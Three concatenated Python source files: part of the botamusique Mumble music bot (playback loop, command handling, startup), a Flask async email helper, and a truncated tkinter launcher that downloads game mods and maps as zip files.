self.log = logging.getLogger("bot")
self.log.info(f"bot: botamusique version {self.get_version()}, starting...")
signal.signal(signal.SIGINT, self.ctrl_caught)
self.cmd_handle = {}
self.stereo = var.config.getboolean('bot', 'stereo', fallback=True)
if args.channel:
self.channel = args.channel
else:
self.channel = var.config.get("server", "channel", fallback=None)
var.user = args.user
var.is_proxified = var.config.getboolean(
"webinterface", "is_web_proxified")
# Flags to indicate the bot is exiting (Ctrl-C, or !kill)
self.exit = False
self.nb_exit = 0
# Related to ffmpeg thread
self.thread = None
self.thread_stderr = None
self.read_pcm_size = 0
self.pcm_buffer_size = 0
self.last_ffmpeg_err = ""
# Play/pause status
self.is_pause = False
self.pause_at_id = ""
self.playhead = -1 # current position in a song.
self.song_start_at = -1
self.wait_for_ready = False # flag for the loop are waiting for download to complete in the other thread
#
self.on_interrupting = False
if args.host:
host = args.host
else:
host = var.config.get("server", "host")
if args.port:
port = args.port
else:
port = var.config.getint("server", "port")
if args.password:
password = args.password
else:
password = var.config.get("server", "password")
if args.channel:
self.channel = args.channel
else:
self.channel = var.config.get("server", "channel")
if args.certificate:
certificate = args.certificate
else:
certificate = util.solve_filepath(var.config.get("server", "certificate"))
if args.tokens:
tokens = args.tokens
else:
tokens = var.config.get("server", "tokens")
tokens = tokens.split(',')
if args.user:
self.username = args.user
else:
self.username = var.config.get("bot", "username")
self.mumble = pymumble.Mumble(host, user=self.username, port=port, password=password, tokens=tokens,
stereo=self.stereo,
debug=var.config.getboolean('debug', 'mumbleConnection'),
certfile=certificate)
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_TEXTMESSAGERECEIVED, self.message_received)
self.mumble.set_codec_profile("audio")
self.mumble.start() # start the mumble thread
self.mumble.is_ready() # wait for the connection
if self.mumble.connected >= pymumble.constants.PYMUMBLE_CONN_STATE_FAILED:
exit()
self.set_comment()
self.mumble.users.myself.unmute() # by sure the user is not muted
self.join_channel()
self.mumble.set_bandwidth(200000)
# ====== Volume ======
self.volume_helper = util.VolumeHelper()
_volume = var.config.getfloat('bot', 'volume', fallback=0.1)
if var.db.has_option('bot', 'volume'):
_volume = var.db.getfloat('bot', 'volume')
self.volume_helper.set_volume(_volume)
self.is_ducking = False
self.on_ducking = False
self.ducking_release = time.time()
self.last_volume_cycle_time = time.time()
self._ducking_volume = 0
_ducking_volume = var.config.getfloat("bot", "ducking_volume", fallback=0.05)
_ducking_volume = var.db.getfloat("bot", "ducking_volume", fallback=_ducking_volume)
self.volume_helper.set_ducking_volume(_ducking_volume)
self.ducking_threshold = var.config.getfloat("bot", "ducking_threshold", fallback=5000)
self.ducking_threshold = var.db.getfloat("bot", "ducking_threshold", fallback=self.ducking_threshold)
if not var.db.has_option("bot", "ducking") and var.config.getboolean("bot", "ducking", fallback=False) \
or var.config.getboolean("bot", "ducking"):
self.is_ducking = True
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_SOUNDRECEIVED,
self.ducking_sound_received)
self.mumble.set_receive_sound(True)
assert var.config.get("bot", "when_nobody_in_channel") in ['pause', 'pause_resume', 'stop', 'nothing', ''], \
"Unknown action for when_nobody_in_channel"
if var.config.get("bot", "when_nobody_in_channel", fallback='') in ['pause', 'pause_resume', 'stop']:
user_change_callback = \
lambda user, action: threading.Thread(target=self.users_changed,
args=(user, action), daemon=True).start()
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_USERREMOVED, user_change_callback)
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_USERUPDATED, user_change_callback)
# Debug use
self._loop_status = 'Idle'
self._display_rms = False
self._max_rms = 0
self.redirect_ffmpeg_log = var.config.getboolean('debug', 'redirect_ffmpeg_log', fallback=True)
if var.config.getboolean("bot", "auto_check_update"):
def check_update():
nonlocal self
new_version, changelog = util.check_update(self.get_version())
if new_version:
self.send_channel_msg(tr('new_version_found', new_version=new_version, changelog=changelog))
th = threading.Thread(target=check_update, name="UpdateThread")
th.daemon = True
th.start()
last_startup_version = var.db.get("bot", "version", fallback=None)
if not last_startup_version or version.parse(last_startup_version) < version.parse(self.version):
var.db.set("bot", "version", self.version)
changelog = util.fetch_changelog()
self.send_channel_msg(tr("update_successful", version=self.version, changelog=changelog))
# Set the CTRL+C shortcut
def ctrl_caught(self, signal, frame):
self.log.info(
"\nSIGINT caught, quitting, {} more to kill".format(2 - self.nb_exit))
if var.config.getboolean('bot', 'save_playlist', fallback=True) \
and var.config.get("bot", "save_music_library", fallback=True):
self.log.info("bot: save playlist into database")
var.playlist.save()
if self.nb_exit > 1:
self.log.info("Forced Quit")
sys.exit(0)
self.nb_exit += 1
self.exit = True
def get_version(self):
if self.version != "git":
return self.version
else:
return util.get_snapshot_version()
def register_command(self, cmd, handle, no_partial_match=False, access_outside_channel=False, admin=False):
cmds = cmd.split(",")
for command in cmds:
command = command.strip()
if command:
self.cmd_handle[command] = {'handle': handle,
'partial_match': not no_partial_match,
'access_outside_channel': access_outside_channel,
'admin': admin}
self.log.debug("bot: command added: " + command)
def set_comment(self):
self.mumble.users.myself.comment(var.config.get('bot', 'comment'))
def join_channel(self):
if self.channel:
if '/' in self.channel:
self.mumble.channels.find_by_tree(self.channel.split('/')).move_in()
else:
self.mumble.channels.find_by_name(self.channel).move_in()
# =======================
# Message
# =======================
# All text send to the chat is analysed by this function
def message_received(self, text):
message = text.message.strip()
user = self.mumble.users[text.actor]['name']
if var.config.getboolean('commands', 'split_username_at_space'):
# in can you use https://github.com/Natenom/mumblemoderator-module-collection/tree/master/os-suffixes ,
# you want to split the username
user = user.split()[0]
if message[0] in var.config.get('commands', 'command_symbol'):
# remove the symbol from the message
message = message[1:].split(' ', 1)
# use the first word as a command, the others one as parameters
if len(message) > 0:
command = message[0].lower()
parameter = ''
if len(message) > 1:
parameter = message[1].rstrip()
else:
return
self.log.info('bot: received command ' + command + ' - ' + parameter + ' by ' + user)
# Anti stupid guy function
if not self.is_admin(user) and not var.config.getboolean('bot', 'allow_private_message') and text.session:
self.mumble.users[text.actor].send_text_message(
tr('pm_not_allowed'))
return
for i in var.db.items("user_ban"):
if user.lower() == i[0]:
self.mumble.users[text.actor].send_text_message(
tr('user_ban'))
return
if not self.is_admin(user) and parameter:
input_url = util.get_url_from_input(parameter)
if input_url:
for i in var.db.items("url_ban"):
if input_url == i[0]:
self.mumble.users[text.actor].send_text_message(
tr('url_ban'))
return
command_exc = ""
try:
if command in self.cmd_handle:
command_exc = command
else:
# try partial match
cmds = self.cmd_handle.keys()
matches = []
for cmd in cmds:
if cmd.startswith(command) and self.cmd_handle[cmd]['partial_match']:
matches.append(cmd)
if len(matches) == 1:
self.log.info("bot: {:s} matches {:s}".format(command, matches[0]))
command_exc = matches[0]
elif len(matches) > 1:
self.mumble.users[text.actor].send_text_message(
tr('which_command', commands="<br>".join(matches)))
return
else:
self.mumble.users[text.actor].send_text_message(
tr('bad_command', command=command))
return
if self.cmd_handle[command_exc]['admin'] and not self.is_admin(user):
self.mumble.users[text.actor].send_text_message(tr('not_admin'))
return
if not self.cmd_handle[command_exc]['access_outside_channel'] \
and not self.is_admin(user) \
and not var.config.getboolean('bot', 'allow_other_channel_message') \
and self.mumble.users[text.actor]['channel_id'] != self.mumble.users.myself['channel_id']:
self.mumble.users[text.actor].send_text_message(
tr('not_in_my_channel'))
return
self.cmd_handle[command_exc]['handle'](self, user, text, command_exc, parameter)
except:
error_traceback = traceback.format_exc()
error = error_traceback.rstrip().split("\n")[-1]
self.log.error(f"bot: command {command_exc} failed with error: {error_traceback}\n")
self.send_msg(tr('error_executing_command', command=command_exc, error=error), text)
def send_msg(self, msg, text):
msg = msg.encode('utf-8', 'ignore').decode('utf-8')
# text if the object message, contain information if direct message or channel message
self.mumble.users[text.actor].send_text_message(msg)
def send_channel_msg(self, msg):
msg = msg.encode('utf-8', 'ignore').decode('utf-8')
own_channel = self.mumble.channels[self.mumble.users.myself['channel_id']]
own_channel.send_text_message(msg)
@staticmethod
def is_admin(user):
list_admin = var.config.get('bot', 'admin').rstrip().split(';')
if user in list_admin:
return True
else:
return False
# =======================
# Users changed
# =======================
def users_changed(self, user, message):
own_channel = self.mumble.channels[self.mumble.users.myself['channel_id']]
# only check if there is one more user currently in the channel
# else when the music is paused and somebody joins, music would start playing again
if len(own_channel.get_users()) == 2:
if var.config.get("bot", "when_nobody_in_channel") == "pause_resume":
self.resume()
elif var.config.get("bot", "when_nobody_in_channel") == "pause":
self.send_channel_msg(tr("auto_paused"))
elif len(own_channel.get_users()) == 1:
# if the bot is the only user left in the channel
self.log.info('bot: Other users in the channel left. Stopping music now.')
if var.config.get("bot", "when_nobody_in_channel") == "stop":
self.clear()
else:
self.pause()
# =======================
# Launch and Download
# =======================
def launch_music(self, music_wrapper, start_from=0):
assert music_wrapper.is_ready()
uri = music_wrapper.uri()
self.log.info("bot: play music " + music_wrapper.format_debug_string())
if var.config.getboolean('bot', 'announce_current_music'):
self.send_channel_msg(music_wrapper.format_current_playing())
if var.config.getboolean('debug', 'ffmpeg'):
ffmpeg_debug = "debug"
else:
ffmpeg_debug = "warning"
channels = 2 if self.stereo else 1
self.pcm_buffer_size = 960*channels
command = ("ffmpeg", '-v', ffmpeg_debug, '-nostdin', '-i',
uri, '-ss', f"{start_from:f}", '-ac', str(channels), '-f', 's16le', '-ar', '48000', '-')
self.log.debug("bot: execute ffmpeg command: " + " ".join(command))
# The ffmpeg process is a thread
# prepare pipe for catching stderr of ffmpeg
if self.redirect_ffmpeg_log:
pipe_rd, pipe_wd = util.pipe_no_wait() # Let the pipe work in non-blocking mode
self.thread_stderr = os.fdopen(pipe_rd)
else:
pipe_rd, pipe_wd = None, None
self.thread = sp.Popen(command, stdout=sp.PIPE, stderr=pipe_wd, bufsize=self.pcm_buffer_size)
def async_download_next(self):
# Function start if the next music isn't ready
# Do nothing in case the next music is already downloaded
self.log.debug("bot: Async download next asked ")
while var.playlist.next_item() and var.playlist.next_item().type in ['url', 'url_from_playlist']:
# usually, all validation will be done when adding to the list.
# however, for performance consideration, youtube playlist won't be validate when added.
# the validation has to be done here.
next = var.playlist.next_item()
try:
next.validate()
if not next.is_ready():
self.async_download(next)
break
except ValidationFailedError as e:
self.send_channel_msg(e.msg)
var.playlist.remove_by_id(next.id)
var.cache.free_and_delete(next.id)
def async_download(self, item):
th = threading.Thread(
target=self._download, name="Prepare-" + item.id[:7], args=(item,))
self.log.info(f"bot: start preparing item in thread: {item.format_debug_string()}")
th.daemon = True
th.start()
return th
def validate_and_start_download(self, item):
item.validate()
if not item.is_ready():
self.log.info("bot: current music isn't ready, start downloading.")
self.async_download(item)
self.send_channel_msg(
tr('download_in_progress', item=item.format_title()))
def _download(self, item):
ver = item.version
try:
item.prepare()
except PreparationFailedError as e:
self.send_channel_msg(e.msg)
return False
if item.version > ver:
var.playlist.version += 1
# =======================
# Loop
# =======================
# Main loop of the Bot
def loop(self):
while not self.exit and self.mumble.is_alive():
while self.thread and self.mumble.sound_output.get_buffer_size() > 0.5 and not self.exit:
# If the buffer isn't empty, I cannot send new music part, so I wait
self._loop_status = f'Wait for buffer {self.mumble.sound_output.get_buffer_size():.3f}'
time.sleep(0.01)
raw_music = None
if self.thread:
# I get raw from ffmpeg thread
# move playhead forward
self._loop_status = 'Reading raw'
if self.song_start_at == -1:
self.song_start_at = time.time() - self.playhead
self.playhead = time.time() - self.song_start_at
raw_music = self.thread.stdout.read(self.pcm_buffer_size)
self.read_pcm_size += len(raw_music)
if self.redirect_ffmpeg_log:
try:
self.last_ffmpeg_err = self.thread_stderr.readline()
if self.last_ffmpeg_err:
self.log.debug("ffmpeg: " + self.last_ffmpeg_err.strip("\n"))
except:
pass
if raw_music:
# Adjust the volume and send it to mumble
self.volume_cycle()
if not self.on_interrupting and len(raw_music) == self.pcm_buffer_size:
self.mumble.sound_output.add_sound(
audioop.mul(raw_music, 2, self.volume_helper.real_volume))
elif self.read_pcm_size == 0:
self.mumble.sound_output.add_sound(
audioop.mul(self._fadeout(raw_music, self.stereo, fadein=True), 2, self.volume_helper.real_volume))
elif self.on_interrupting or len(raw_music) < self.pcm_buffer_size:
self.mumble.sound_output.add_sound(
audioop.mul(self._fadeout(raw_music, self.stereo, fadein=False), 2, self.volume_helper.real_volume))
self.thread.kill()
self.thread = None
time.sleep(0.1)
self.on_interrupting = False
else:
time.sleep(0.1)
else:
time.sleep(0.1)
if not self.is_pause and not raw_music:
self.thread = None
# bot is not paused, but ffmpeg thread has gone.
# indicate that last song has finished, or the bot just resumed from pause, or something is wrong.
if self.read_pcm_size < self.pcm_buffer_size \
and var.playlist.current_index != -1 \
and self.last_ffmpeg_err:
current = var.playlist.current_item()
self.log.error("bot: cannot play music %s", current.format_debug_string())
self.log.error("bot: with ffmpeg error: %s", self.last_ffmpeg_err)
self.last_ffmpeg_err = ""
self.send_channel_msg(tr('unable_play', item=current.format_title()))
var.playlist.remove_by_id(current.id)
var.cache.free_and_delete(current.id)
# move to the next song.
if not self.wait_for_ready: # if wait_for_ready flag is not true, move to the next song.
if var.playlist.next():
current = var.playlist.current_item()
self.log.debug(f"bot: next into the song: {current.format_debug_string()}")
try:
self.validate_and_start_download(current)
self.wait_for_ready = True
self.song_start_at = -1
self.playhead = 0
except ValidationFailedError as e:
self.send_channel_msg(e.msg)
var.playlist.remove_by_id(current.id)
var.cache.free_and_delete(current.id)
else:
self._loop_status = 'Empty queue'
else:
# if wait_for_ready flag is true, means the pointer is already
# pointing to target song. start playing
current = var.playlist.current_item()
if current:
if current.is_ready():
self.wait_for_ready = False
self.read_pcm_size = 0
self.launch_music(current, self.playhead)
self.last_volume_cycle_time = time.time()
self.async_download_next()
elif current.is_failed():
var.playlist.remove_by_id(current.id)
self.wait_for_ready = False
else:
self._loop_status = 'Wait for the next item to be ready'
else:
self.wait_for_ready = False
while self.mumble.sound_output.get_buffer_size() > 0 and self.mumble.is_alive():
# Empty the buffer before exit
time.sleep(0.01)
time.sleep(0.5)
if self.exit:
self._loop_status = "exited"
if var.config.getboolean('bot', 'save_playlist', fallback=True) \
and var.config.get("bot", "save_music_library", fallback=True):
self.log.info("bot: save playlist into database")
var.playlist.save()
def volume_cycle(self):
delta = time.time() - self.last_volume_cycle_time
if self.on_ducking and self.ducking_release < time.time():
self.on_ducking = False
self._max_rms = 0
if delta > 0.001:
if self.is_ducking and self.on_ducking:
self.volume_helper.real_volume = \
(self.volume_helper.real_volume - self.volume_helper.ducking_volume_set) * math.exp(- delta / 0.2) \
+ self.volume_helper.ducking_volume_set
else:
self.volume_helper.real_volume = self.volume_helper.volume_set - \
(self.volume_helper.volume_set - self.volume_helper.real_volume) * math.exp(- delta / 0.5)
self.last_volume_cycle_time = time.time()
def ducking_sound_received(self, user, sound):
rms = audioop.rms(sound.pcm, 2)
self._max_rms = max(rms, self._max_rms)
if self._display_rms:
if rms < self.ducking_threshold:
print('%6d/%6d ' % (rms, self._max_rms) + '-' * int(rms / 200), end='\r')
else:
print('%6d/%6d ' % (rms, self._max_rms) + '-' * int(self.ducking_threshold / 200)
+ '+' * int((rms - self.ducking_threshold) / 200), end='\r')
if rms > self.ducking_threshold:
if self.on_ducking is False:
self.log.debug("bot: ducking triggered")
self.on_ducking = True
self.ducking_release = time.time() + 1 # ducking release after 1s
def _fadeout(self, _pcm_data, stereo=False, fadein=False):
pcm_data = bytearray(_pcm_data)
if stereo:
if not fadein:
mask = [math.exp(-x/60) for x in range(0, int(len(pcm_data) / 4))]
else:
mask = [math.exp(-x / 60) for x in reversed(range(0, int(len(pcm_data) / 4)))]
for i in range(int(len(pcm_data) / 4)):
pcm_data[4 * i:4 * i + 2] = struct.pack("<h",
round(struct.unpack("<h", pcm_data[4 * i:4 * i + 2])[0] * mask[i]))
pcm_data[4 * i + 2:4 * i + 4] = struct.pack("<h", round(
struct.unpack("<h", pcm_data[4 * i + 2:4 * i + 4])[0] * mask[i]))
else:
mask = [math.exp(-x/60) for x in range(0, int(len(pcm_data) / 2))]
for i in range(int(len(pcm_data) / 2)):
pcm_data[2 * i:2 * i + 2] = struct.pack("<h",
round(struct.unpack("<h", pcm_data[2 * i:2 * i + 2])[0] * mask[i]))
return bytes(pcm_data) + bytes(len(pcm_data))
# =======================
# Play Control
# =======================
def play(self, index=-1, start_at=0):
if not self.is_pause:
self.interrupt()
if index != -1:
var.playlist.point_to(index)
current = var.playlist.current_item()
self.validate_and_start_download(current)
self.is_pause = False
self.wait_for_ready = True
self.song_start_at = -1
self.playhead = start_at
def clear(self):
# Kill the ffmpeg thread and empty the playlist
self.interrupt()
var.playlist.clear()
self.wait_for_ready = False
self.log.info("bot: music stopped. playlist trashed.")
def stop(self):
self.interrupt()
self.is_pause = True
if len(var.playlist) > 0:
self.wait_for_ready = True
else:
self.wait_for_ready = False
self.log.info("bot: music stopped.")
def interrupt(self):
# Kill the ffmpeg thread
if self.thread:
self.on_interrupting = True
time.sleep(0.1)
self.song_start_at = -1
self.read_pcm_size = 0
def pause(self):
# Kill the ffmpeg thread
self.interrupt()
self.is_pause = True
self.song_start_at = -1
if len(var.playlist) > 0:
self.pause_at_id = var.playlist.current_item().id
self.log.info(f"bot: music paused at {self.playhead:.2f} seconds.")
def resume(self):
self.is_pause = False
if var.playlist.current_index == -1:
var.playlist.next()
self.playhead = 0
return
music_wrapper = var.playlist.current_item()
if not music_wrapper or not music_wrapper.id == self.pause_at_id or not music_wrapper.is_ready():
self.playhead = 0
return
self.wait_for_ready = True
self.pause_at_id = ""
def start_web_interface(addr, port):
global formatter
import interface
# setup logger
werkzeug_logger = logging.getLogger('werkzeug')
logfile = util.solve_filepath(var.config.get('webinterface', 'web_logfile'))
if logfile:
handler = logging.handlers.RotatingFileHandler(logfile, mode='a', maxBytes=10240) # Rotate after 10KB
else:
handler = logging.StreamHandler()
werkzeug_logger.addHandler(handler)
interface.init_proxy()
interface.web.env = 'development'
interface.web.secret_key = var.config.get('webinterface', 'flask_secret')
interface.web.run(port=port, host=addr)
if __name__ == '__main__':
supported_languages = util.get_supported_language()
parser = argparse.ArgumentParser(
description='Bot for playing music on Mumble')
# General arguments
parser.add_argument("--config", dest='config', type=str, default='configuration.ini',
help='Load configuration from this file. Default: configuration.ini')
parser.add_argument("--db", dest='db', type=str,
default=None, help='Settings database file')
parser.add_argument("--music-db", dest='music_db', type=str,
default=None, help='Music library database file')
parser.add_argument("--lang", dest='lang', type=str, default=None,
help='Preferred language. Support ' + ", ".join(supported_languages))
parser.add_argument("-q", "--quiet", dest="quiet",
action="store_true", help="Only Error logs")
parser.add_argument("-v", "--verbose", dest="verbose",
action="store_true", help="Show debug log")
# Mumble arguments
parser.add_argument("-s", "--server", dest="host",
type=str, help="Hostname of the Mumble server")
parser.add_argument("-u", "--user", dest="user",
type=str, help="Username for the bot")
parser.add_argument("-P", "--password", dest="password",
type=str, help="Server password, if required")
parser.add_argument("-T", "--tokens", dest="tokens",
type=str, help="Server tokens, if required")
parser.add_argument("-p", "--port", dest="port",
type=int, help="Port for the Mumble server")
parser.add_argument("-c", "--channel", dest="channel",
type=str, help="Default channel for the bot")
parser.add_argument("-C", "--cert", dest="certificate",
type=str, default=None, help="Certificate file")
args = parser.parse_args()
# ======================
# Load Config
# ======================
config = configparser.ConfigParser(interpolation=None, allow_no_value=True)
var.config = config
parsed_configs = config.read([util.solve_filepath('configuration.default.ini'), util.solve_filepath(args.config)],
encoding='utf-8')
if len(parsed_configs) == 0:
logging.error('Could not read configuration from file \"{}\"'.format(args.config))
sys.exit()
# ======================
# Setup Logger
# ======================
bot_logger = logging.getLogger("bot")
bot_logger.setLevel(logging.INFO)
if args.verbose:
bot_logger.setLevel(logging.DEBUG)
bot_logger.debug("Starting in DEBUG loglevel")
elif args.quiet:
bot_logger.setLevel(logging.ERROR)
bot_logger.error("Starting in ERROR loglevel")
logfile = util.solve_filepath(var.config.get('bot', 'logfile').strip())
handler = None
if logfile:
print(f"Redirecting stdout and stderr to log file: {logfile}")
handler = logging.handlers.RotatingFileHandler(logfile, mode='a', maxBytes=10240) # Rotate after 10KB
sys.stdout = util.LoggerIOWrapper(bot_logger, logging.INFO, fallback_io_buffer=sys.stdout.buffer)
sys.stderr = util.LoggerIOWrapper(bot_logger, logging.INFO, fallback_io_buffer=sys.stderr.buffer)
else:
handler = logging.StreamHandler()
util.set_logging_formatter(handler, bot_logger.level)
bot_logger.addHandler(handler)
logging.getLogger("root").addHandler(handler)
var.bot_logger = bot_logger
# ======================
# Load Database
# ======================
if args.user:
username = args.user
else:
username = var.config.get("bot", "username")
sanitized_username = "".join([x if x.isalnum() else "_" for x in username])
var.settings_db_path = args.db if args.db is not None else util.solve_filepath(
config.get("bot", "database_path", fallback=f"settings-{sanitized_username}.db"))
var.music_db_path = args.music_db if args.music_db is not None else util.solve_filepath(
config.get("bot", "music_database_path", fallback="music.db"))
var.db = SettingsDatabase(var.settings_db_path)
if var.config.get("bot", "save_music_library", fallback=True):
var.music_db = MusicDatabase(var.music_db_path)
else:
var.music_db = MusicDatabase(":memory:")
DatabaseMigration(var.db, var.music_db).migrate()
var.music_folder = util.solve_filepath(var.config.get('bot', 'music_folder'))
var.tmp_folder = util.solve_filepath(var.config.get('bot', 'tmp_folder'))
# ======================
# Translation
# ======================
lang = ""
if args.lang:
lang = args.lang
else:
lang = var.config.get('bot', 'language', fallback='en_US')
if lang not in supported_languages:
raise KeyError(f"Unsupported language {lang}")
var.language = lang
constants.load_lang(lang)
# ======================
# Prepare Cache
# ======================
var.cache = MusicCache(var.music_db)
if var.config.getboolean("bot", "refresh_cache_on_startup", fallback=True):
var.cache.build_dir_cache()
# ======================
# Load playback mode
# ======================
playback_mode = None
if var.db.has_option("playlist", "playback_mode"):
playback_mode = var.db.get('playlist', 'playback_mode')
else:
playback_mode = var.config.get('bot', 'playback_mode', fallback="one-shot")
if playback_mode in ["one-shot", "repeat", "random", "autoplay"]:
var.playlist = media.playlist.get_playlist(playback_mode)
else:
raise KeyError(f"Unknown playback mode '{playback_mode}'")
# ======================
# Create bot instance
# ======================
var.bot = MumbleBot(args)
command.register_all_commands(var.bot)
# load playlist
if var.config.getboolean('bot', 'save_playlist', fallback=True):
var.bot_logger.info("bot: load playlist from previous session")
var.playlist.load()
# ============================
# Start the web interface
# ============================
if var.config.getboolean("webinterface", "enabled"):
wi_addr = var.config.get("webinterface", "listening_addr")
wi_port = var.config.getint("webinterface", "listening_port")
tt = threading.Thread(
target=start_web_interface, name="WebThread", args=(wi_addr, wi_port))
tt.daemon = True
bot_logger.info('Starting web interface on {}:{}'.format(wi_addr, wi_port))
tt.start()
# Start the main loop.
var.bot.loop()
|
email.py
|
from flask_mail import Message
from threading import Thread
from flask import render_template, current_app
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['BIAO_MAIL_SUBJECT_PREFIX'] + subject, sender=app.config['SECURITY_EMAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
defiance_launcher.py
|
import os, subprocess, shutil
import parser5
from tkinter import *
import tkinter.messagebox
from tkinter import simpledialog
import requests, zipfile, io, tldextract, json
import pygame, threading, re
class myWindow(Frame):
def __init__(self,parent=None):
Frame.__init__(self,parent)
self.parent = parent
self.pack()
self.make_widgets()
def make_widgets(self):
# don't assume that self.parent is a root window.
# instead, call `winfo_toplevel to get the root window
self.winfo_toplevel().title("Defiance Launcher "+ver)
# this adds something to the frame, otherwise the default
# size of the window will be very small
#label = Entry(self)
#label.pack(side="top", fill="x")
def valid_url(url):
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
a = re.match(regex, url)
if a:
return True
else:
return False
def doesnothing():
tkinter.messagebox.showwarning("In Development", "Oops, this does nothing at the moment :(")
def ask_url():
f1=False
f2=False
#f3=False
url = simpledialog.askstring("Input", "Note: You may only download zip files\nEnter URL: ")
#print(url)
if url != None:
a=valid_url(url)
if a != True:
tkinter.messagebox.showwarning("Invalid", "Not a valid URL. Please try again.")
else:
f2=True
if url != None and f2==True:
ext = tldextract.extract(url)
#ext.domain == "dropbox"
#url = url + "?raw=1"
b = url[-4:]
if b != '.zip' and ext.domain != "dropbox":
tkinter.messagebox.showwarning("Invalid","URL must end with \".zip\"")
#print(b)
if ext.domain == "dropbox":
if re.search(r'preview=', url, re.IGNORECASE):
raise ValueError("You are using dropbox's preivew link, use actual zipfile link!\n\nHint: Right click on zipfile, select \"Copy link address\"")
if re.search(r'\?dl=0', url, re.IGNORECASE):
r = re.compile(r'\?dl=0',re.IGNORECASE)
url = r.sub(r'', url)
b = url[-4:]
if b == '.zip':
url=url+"?dl=1"
else:
raise ValueError("Bad Download URL")
f1 = True
if(f1 and f2 == True):
return url
def dl_resources(url, asset):
#download and unpack zip file in mod folder
try:
statusText.set("Downloading...Please wait..")
disableLaunch()
# download from url
r = requests.get(url)
# extract filename from url header
d = r.headers['content-disposition']
modName = re.findall("filename=(.+)", d)
modName = ''.join(modName)
modName = re.findall(r'"([^"]*)"', modName)
modName = ''.join(modName)
modName = modName[:-4]
print("starting unzip")
z = zipfile.ZipFile(io.BytesIO(r.content))
fname=z.namelist()[0].split("/")[0]
if asset == "map":
z.extractall("maps/")
elif asset == "mod":
z.extractall("mods/")
else:
print("dl asset err")
# update resources with new asset
with open("resources.json", "r") as jsonFile:
data = json.load(jsonFile)
a = asset + "s"
match = False
for i in data[a]:
if i["name"] == modName:
match = True
if match == False:
data[a].append({'name': modName, 'folderName': fname, 'url': url})
with open("resources.json", "w") as jsonFile:
json.dump(data, jsonFile)
except:
e = sys.exc_info()[0]
tkinter.messagebox.showwarning("Error", "Error: %s" % e)
return "error"
statusText.set("Ready.")
enableLaunch()
def dl_map():
try:
a = ask_url()
if a:
v = dl_resources(a,"map")
if v != "error":
map_dropdown = []
mp.children["menu"].delete(0, "end")
data = json.load(open("resources.json"))
for map in data["maps"]:
map_dropdown.append(map["name"])
mp.children["menu"].add_command(label=map["name"], command=lambda m=map["name"]: map_select(m))
#setMenu('map')
with open("state.json", "r") as jsonFile:
statedata = json.load(jsonFile)
if statedata["map"] == "":
variable2.set("MAPs")
else:
variable2.set(statedata["map"])
except ValueError as err:
tkinter.messagebox.showwarning("Error", err.args)
def dl_mod():
try:
a = ask_url()
if a:
v = dl_resources(a,"mod")
if v != "error":
mod_dropdown = []
md.children["menu"].delete(0, "end")
data = json.load(open("resources.json"))
for mod in data["mods"]:
mod_dropdown.append(mod["name"])
md.children["menu"].add_command(label=mod["name"], command=lambda m=mod["name"]: mod_select(m))
#setMenu('mod')
#with open("state.json", "r") as jsonFile:
# statedata = json.load(jsonFile)
#if statedata["map"] == "":
# variable1.set("MAPs")
#else:
# variable1.set(statedata["map"])
except ValueError as err:
tkinter.messagebox.showwarning("Error", err.args)
def aboutpage():
tkinter.messagebox.showinfo("About Defiance-Launcher", "Contribute at https://www.github.com/m3hran/defiance-launcher")
def setMenu(type):
statedata = json.load(open("state.json"))
if type == "mod":
if statedata["mod"] == "":
a = parser5.find_existing("mod")
if a:
variable1.set(a)
with open("state.json", "r") as jsonFile:
data = json.load(jsonFile)
data[type] = a
with open("state.json", "w") as jsonFile:
json.dump(data, jsonFile)
else:
variable1.set("MODs")
if statedata["mod"] != "":
variable1.set(statedata["mod"])
if type == "map":
if statedata["map"] == "":
a = parser5.find_existing("map")
if a:
variable2.set(a)
with open("state.json", "r") as jsonFile:
data = json.load(jsonFile)
data[type] = a
print("setting asset " + data[type])
with open("state.json", "w") as jsonFile:
json.dump(data, jsonFile)
else:
variable2.set("MAPs")
if statedata["map"] != "":
variable2.set(statedata["map"])
def init_resources():
#init in a different thread
def callback1():
sema.acquire()
# Ensure resources.json exists otherwise fail.
if not os.path.isfile("resources.json"):
tkinter.messagebox.showwarning("Error", "Could not find resources.json file.")
root.destory()
# Create folders
if not os.path.exists("mods"):
os.makedirs("mods")
if not os.path.exists("maps"):
os.makedirs("maps")
# load resources
data = json.load(open("resources.json"))
# Download MODs if necessary
for mod in data["mods"]:
if not os.path.exists("mods/"+mod["folderName"]):
lock.set("true")
statusText.set("Downloading " + mod["name"] + " ...")
dl_resources(mod["url"],"mod")
#print("downloading "+mod["name"])
lock.set("false")
# Download Maps if necessary
for map in data["maps"]:
if not os.path.exists("maps/"+ map["folderName"]):
lock.set("true")
statusText.set("Downloading " + map["name"] + "...")
dl_resources(map["url"],"map")
#print("downloading "+map["name"])
lock.set("false")
statusText.set("Locating Steamapps...Please wait..")
if (sema.acquire(blocking=False)):
statusText.set("Ready.")
sema.release()
def callback2():
sema.acquire()
with open("state.json", "r") as jsonFile:
data = json.load(jsonFile)
if data["path"] == "" or data["path"] == None:
statusText.set("Locating Steamapps...Please wait..")
lock.set("true")
install_path=parser5.find_installation()
print("game path found!")
statusText.set("Steamapps Located...")
data["path"]=install_path
with open('state.json', 'w') as f:
json.dump(data, f, ensure_ascii=False)
if (sema.acquire(blocking=False)):
statusText.set("Ready.")
lock.set("false")
sema.release()
t1 = threading.Thread(target=callback1)
t1.start()
t2 = threading.Thread(target=callback2)
t2.start()
def LaunchCiv():
if sema.acquire(blocking=False):
data = json.load(open("state.json"))
print(data["path"])
steampath=data["path"]
